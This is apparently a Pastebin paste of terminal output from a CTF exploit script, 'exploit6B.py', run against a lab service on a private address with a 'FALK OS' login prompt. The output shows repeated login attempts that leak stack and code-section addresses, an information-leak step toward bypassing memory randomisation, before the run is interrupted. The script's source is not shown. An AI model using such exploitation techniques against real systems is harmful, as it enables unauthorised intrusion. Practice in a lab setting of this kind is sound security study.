Advertisement
Guest User

Untitled

a guest
Jan 8th, 2017
128
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.99 KB | None | 0 0
  1. xothed@xoth:~/CTF$ python exploit6B.py
  2. [+] Opening connection to 192.168.56.104 on port 6642: Done
  3. ----------- FALK OS LOGIN PROMPT -----------
  4. Enter your username:
  5. [*] Sending username
  6.  Enter your password:
  7. [*] Sending password
  8. Leaked 1 unknown: 0xb47dac7b
  9. Leaked code section unknown: 0xb47dac7b
  10. Leaked stack address: 0xbc8c17bb
  11. Leaked code section address [test eax,eax after login prompt main+189]: 0xb47d8c7d
  12.  
  13. Enter your username:
  14. [*] Sending username
  15.  Enter your password:
  16. [*] Sending password
  17. Leaked 1 unknown: 0xb77eaf78
  18. Leaked code section unknown: 0xb77eaf78
  19. Leaked stack address: 0xbf8f14b8
  20. Leaked code section address [test eax,eax after login prompt main+189]: 0xb77e8f7e
  21.  
  22. Enter your username:
  23. [*] Sending username
  24.  Enter your password:
  25. [*] Sending password
  26. Leaked 1 unknown: 0xb47dac7b
  27. Leaked code section unknown: 0xb47dac7b
  28. Leaked stack address: 0xbc8c17bb
  29. Leaked code section address [test eax,eax after login prompt main+189]: 0xb47d8c7d
  30.  
  31. Enter your username:
  32. [*] Sending username
  33.  Enter your password:
  34. [*] Sending password
  35. Leaked 1 unknown: 0xb77eaf78
  36. Leaked code section unknown: 0xb77eaf78
  37. Leaked stack address: 0xbf8f14b8
  38. Leaked code section address [test eax,eax after login prompt main+189]: 0xb77e8f7e
  39.  
  40. Enter your username:
  41. [*] Sending username
  42.  Enter your password:
  43. [*] Sending password
  44. Leaked 1 unknown: 0xb47dac7b
  45. Leaked code section unknown: 0xb47dac7b
  46. Leaked stack address: 0xbc8c17bb
  47. Leaked code section address [test eax,eax after login prompt main+189]: 0xb47d8c7d
  48.  
  49. Enter your username:
  50. [*] Sending username
  51.  Enter your password:
  52. [*] Sending password
  53. Leaked 1 unknown: 0xb77eaf78
  54. Leaked code section unknown: 0xb77eaf78
  55. Leaked stack address: 0xbf8f14b8
  56. Leaked code section address [test eax,eax after login prompt main+189]: 0xb77e8f7e
  57.  
  58. Enter your username:
  59. [*] Sending username
  60. Traceback (most recent call last):
  61.   File "exploit6B.py", line 15, in <module>
  62.     time.sleep(1)
  63. KeyboardInterrupt
  64. [*] Closed connection to 192.168.56.104 port 6642
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement